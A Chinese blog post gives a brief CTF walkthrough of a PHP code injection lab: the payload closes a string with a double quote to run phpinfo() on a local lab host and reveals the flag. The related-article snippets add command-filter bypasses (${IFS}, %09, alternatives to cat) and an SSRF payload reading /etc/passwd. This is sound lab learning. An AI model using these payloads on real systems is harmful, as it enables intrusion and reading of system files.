Vuln-Range之php命令注入

最新推荐文章于 2023-09-17 13:21:19 发布
最新推荐文章于 2023-09-17 13:21:19 发布
阅读量249 收藏
点赞数
文章标签: php 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lionwerson/article/details/115311802
版权

1.开启靶场

简介显示有phpcode注入漏洞,简单绕过之后就可以执行phpinfo(),拿到flag啦。

通过传入name参数的值就可以来进行代码注入了。

2.随便试一个值

http://192.168.0.20:32769/?name=phpinfo()

果然没有那么简单,被过滤了。

3.查看源码

 

我不太懂php的代码,查阅了一下,可以通过截断的方式来进行绕过

";phpinfo();"\ #通过;来把拼接的字符串截断就可以绕过了
http://192.168.0.20:32769/?name=%22;phpinfo();%22\

拿到flag

flag{39a23b19e7df2581be80091b484687bc}

 

lionwerson
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Struts2-Vuln-Demo:Struts2防御实例
03-08
前言 开始学习struts2代码审计时,发现各位师傅分析分析的文章很多,但是给突破demo源码的却很少。并且很多重复复现是在struts2官方案例上进行的。而官方案例代码太多,对于初学者来说无法快速聚焦突破点。...
ThinkPHP-Vuln-master.zip
08-05
本篇文章将聚焦于"ThinkPHP-Vuln-master.zip"这个压缩包中的内容,深入探讨ThinkPHP历史上的几个关键漏洞,帮助开发者理解并防范潜在的安全风险。 1. **远程代码执行(Remote Code Execution, RCE)漏洞** 在...
vulrange命令执行靶场绕过
lionwerson的博客
03-31 244
1.开启靶场,提示过滤了cat命令 1.过滤了cat命令可以用其他的命令代替 (1)more (2)head (3)sort 等其他的命令替代 |ls #显示flag文件 |ls flag #显示flag文件 显示出flag852456.txt | more flag/flag852456.txt 读取flag 读取到的flag,其实也可以直接访问这个文件。 2.过滤空格 ${IFS} ${IFS}$1 $IFS+$1 <> %09(php环境下) 通过上面三种
Vuln-Range CVE-2017-15715
lionwerson的博客
04-01 209
1.CVE-2017-15715 Apache的解析漏洞,可以上传文件 2.开启靶场 3.通过burp抓包上传webshell 漏洞要通过十六进制在文件末尾添加换行符,来绕过文件上传,但是新版的burp的hex模式直接在右边更改就可以了,先添加一个空格,然后在进行更改。 已经上传成功了,文件已经被解析了。 蚁剑连接一下,连接成功,但是好像没有显示出换行符的文件,我又上传了一个2.php.xxx,但是没有被解析。 ...
记录一次vuln靶场的渗透过程---driftingblues9
bobo_milk的博客
05-06 1147
一次小渗透记录 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决.
phpvuln|代码审计——查找PHP代码漏洞工具
CHATUQ的博客
03-09 648
phpvuln|代码审计——查找PHP代码漏洞工具 0x00 简介 phpvuln是用Python 3编写的开源OWASP渗透测试工具,它可以加快在PHP代码中查找常见PHP漏洞的过程,例如命令注入,本地/远程文件包含和SQL注入。 0x01 phpvuln安装方法 github直接git,命令如下 git clone https://github.com/ecriminal/phpvuln.git 安装所需的PIP软件包: python -m pip install -r requirements.tx
vuln靶场--MoneyBox
bobo_milk的博客
05-12 840
文章目录 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 ​​​​ nmap -A -v -T4 -p 1-65535 192.168.216.145 可以看到服务器开启了80端口和22ssh的端口和21端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 二、漏洞发现 访问服务器的80端口 一个非常普通的网站,在目前来看并不能发现什么业务功能,查看了一下源代码发现中间的按...
nmap-vuln-scan
02-18
对于“nmap-vuln-scan-master”这个项目,它很可能是包含了一套完整的Nmap漏洞扫描解决方案,包括C#代码、配置文件、扫描策略和可能的自定义NSE脚本。深入研究这个项目,可以帮助我们更好地理解和实践Nmap在C#环境下...
ThinkPHP-Vuln-Demo:ThinkPHP例程实例
03-23
2. **命令注入**:当应用将用户输入传递给系统命令时,如果未进行适当验证,可能会导致命令注入。在`ThinkPHP`中,通过模型、助手函数等调用系统命令时,应确保所有输入已进行充分的清理和转义。 3. **文件上传漏洞...
vuln-dev-env
02-20
开发环境要求: 虚拟箱6.1 流浪汉遵循的步骤: 通过运行以下命令将此仓库克隆到您的主机中: vagrant up 使用以下凭据登录到虚拟机: username: vagrant password: vagrant 运行配置脚本: sudo ./scripts/dev-env....
phpvuln:审核工具,以查找PHP源代码中的常见漏洞-Source code audit
03-25
phpvuln phpvuln是用Python 3编写的开放源代码OWASP渗透测试工具,它可以加快在PHP代码中查找常见PHP漏洞的过程,例如命令注入,本地/远程文件包含和SQL注入。 截屏 安装 您可以通过克隆Git存储库来下载phpvuln: git clone https://github.com/ecriminal/phpvuln.git 安装所需的PIP软件包: python -m pip install -r requirements.txt 用法 要获取所有选项的列表,请使用: python phpvuln.py -h 贡献者 校验和 我目前正在寻找有助于改善phpvuln的贡献者。 如果您有兴趣,请通过Discord与我联系:-)
vuln-range之ssrf靶场
lionwerson的博客
03-31 557
1.开启靶机 提示用url传入参数进去,直接读出文件,完事。 ?url=file:///etc/passwd #注意三个斜杠
VulnHub打靶のLazySysAdmin
壊壊的诱惑你的博客
10-09 1402
靶机地址: https://drive.google.com/uc?id=0B_A-fCfoBmkLOXN5Y1ZmZnpDQTQ&amp;export=download nmap -sP 或netdiscover -r 扫描目标机:这里192.168.1.159为目标机。 nmap开路扫描全端口: root@Kali-X86:~# nmap -sV -p- 192.168.1.159 St...
Vuln靶机系列:02TiKi-CMS漏洞利用-对新手非常友好!!!
最新发布
weixin_45965246的博客
09-17 214
首次使用CMS漏洞该靶机通过的方式有多种,比如:sudo提权、Ubuntu提权使用到的python脚本挺多查看Ubuntu版本使用base64编码写入webshellSmarty沙盒绕过漏洞-RCE反弹shell。
网络安全、渗透测试靶场全集
qq_37776764的博客
04-26 833
writeup文章:https://github.com/niudaii/my-vulstack-wp。封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。武汉安鸾学院 – 武汉网络安全培训-渗透测试培训-Web安全培训。在线演示: http://vulfocus.fofa.so/10.python2的常见漏洞靶场(python2)LFI-labs 和本地文件包后漏洞利用靶场。Sqli-Labs:(sql注入靶场)3.韩国Webhacking。
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1002
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
渗透测试练习靶场汇总
热门推荐
Thunderclap的博客
07-01 1万+
渗透测试 练习常用靶场汇总
风炫安全WEB安全学习第四十九节课 靶场的搭建与实战
风炫的博客
02-09 1068
靶场实战 自《网络安全法》实施以后,在互联网上未经授权的渗透测试是违法行为。缺少了实战的战场,我们现在一般用靶场来进行实战的渗透测试学习,因为这样不会影响别人网站服务的正常运行,不会影响到别人的业务。 我在这里推荐几个靶场,然后可以对靶场里面的漏洞进行针对化学习并实战。 线上靶场推荐 https://hack.zkaq.cn/ 封神台,掌控安全的线上靶场 https://www.ichunqiu.com/ I春秋,很早就出来的一个综合的靶场。 https://redtiger.labs.overthewir
Error: EPERM: operation not permitted, unlink \'D:\\project\\vuln-library\\node_modules\\.staging\\mockjs-cb074746\\src\\dependencies.png
08-30
这个错误通常是由于权限问题导致的。EPERM 表示操作不被允许...在命令行中使用 `del` 命令或在文件资源管理器中手动删除文件。 请注意,如果您不确定删除该文件是否安全,请备份文件或咨询有关该文件的其他开发人员。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值